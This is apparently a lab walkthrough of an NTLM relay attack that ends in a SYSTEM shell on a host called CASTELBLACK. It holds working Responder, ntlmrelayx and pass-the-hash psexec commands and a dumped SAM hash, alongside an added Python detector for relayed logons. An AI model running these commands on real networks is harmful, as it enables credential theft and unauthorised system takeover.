If SMB signing is disabled on a target, we can relay a live authentication and turn it straight into execution without a password.
Triggering the Authentication
An NTLM relay only works if something authenticates to us.
That usually happens when a user hits a UNC path, intentionally or by mistake.
\\sometypo\share
Name resolution fallbacks like LLMNR or NBT-NS make this common in real networks. Responder listens for these events and captures the authentication when it happens.
sudo responder -I eth0 -dwP
Relaying the Session
Generate a list of hosts that will accept relayed NTLM authentication.
nxc smb 10.3.10.0/24 --gen-relay-list relay_targets.txt
When the authentication hits the wire, we relay it to vulnerable targets.
sudo impacket-ntlmrelayx -tf relay_targets.txt -smb2support
This happens in real time; no hash cracking is necessary.
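On the defensive side, a relayed logon shows up on the target as a network NTLM logon (event 4624, logon type 3) whose claimed workstation name does not belong to the source IP that actually connected. The following added example (not code from the original post) applies that heuristic to constructed 4624-style records against a constructed hostname-to-IP inventory; both the field names and the inventory are assumptions about how such records would be exported.

```python
"""Flag network NTLM logons whose claimed workstation name does not match the
connecting IP, a common indicator of relayed authentication.
Added example: the inventory and the events below are constructed, not real."""
import ipaddress

# Constructed inventory: workstation name -> the IP it is known to use.
HOST_INVENTORY = {
    "WS01": "10.3.10.21",
    "WS02": "10.3.10.22",
}

# Constructed Security-log records reduced to the 4624 fields that matter here.
SAMPLE_EVENTS = [
    {"EventID": 4624, "LogonType": 3, "AuthenticationPackageName": "NTLM",
     "TargetUserName": "jsnow", "WorkstationName": "WS01", "IpAddress": "10.3.10.21"},
    # Same claimed workstation, but the connection came from a different host.
    {"EventID": 4624, "LogonType": 3, "AuthenticationPackageName": "NTLM",
     "TargetUserName": "jsnow", "WorkstationName": "WS01", "IpAddress": "10.3.10.99"},
    {"EventID": 4624, "LogonType": 3, "AuthenticationPackageName": "Kerberos",
     "TargetUserName": "jsnow", "WorkstationName": "WS02", "IpAddress": "10.3.10.22"},
    {"EventID": 4624, "LogonType": 2, "AuthenticationPackageName": "NTLM",
     "TargetUserName": "admin", "WorkstationName": "WS02", "IpAddress": "127.0.0.1"},
]


def is_suspicious_ntlm_logon(event, inventory=HOST_INVENTORY):
    """True for a network NTLM logon whose source IP is not the one recorded
    for the workstation name the client claimed (or whose name is unknown)."""
    if event.get("EventID") != 4624 or event.get("LogonType") != 3:
        return False
    if event.get("AuthenticationPackageName") != "NTLM":
        return False
    src = event.get("IpAddress", "")
    # Local and unrecorded sources cannot be relayed from another host.
    if src in ("", "-") or ipaddress.ip_address(src).is_loopback:
        return False
    expected = inventory.get(event.get("WorkstationName", "").upper())
    if expected is None:
        return True  # unknown workstation name: surface it for review
    return expected != src


def find_relay_candidates(events, inventory=HOST_INVENTORY):
    """Return (user, claimed workstation, source IP) for every suspicious logon."""
    return [(e["TargetUserName"], e["WorkstationName"], e["IpAddress"])
            for e in events if is_suspicious_ntlm_logon(e, inventory)]


if __name__ == "__main__":
    for user, ws, ip in find_relay_candidates(SAMPLE_EVENTS):
        print(f"possible relayed NTLM logon: user={user} claimed={ws} from={ip}")
```

Run over a real export, this is noisy without a maintained inventory; pairing it with the SMB signing and LLMNR/NBT-NS settings of the hosts involved turns the hits into something actionable.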

From Relay to SYSTEM
Because the relayed user has local admin rights, the target accepts the connection. ntlmrelayx enables RemoteRegistry and dumps the local SAM.
Administrator:500:aad3b435b51404eeaad3b435b51404ee:dbd13e1c4e338284ac4e9874f7de6ef4:::
We pass the hash to get a SYSTEM shell.
impacket-psexec Administrator@192.168.66.22 -hashes aad3b435b51404eeaad3b435b51404ee:dbd13e1c4e338284ac4e9874f7de6ef4
And get SYSTEM on CASTELBLACK.
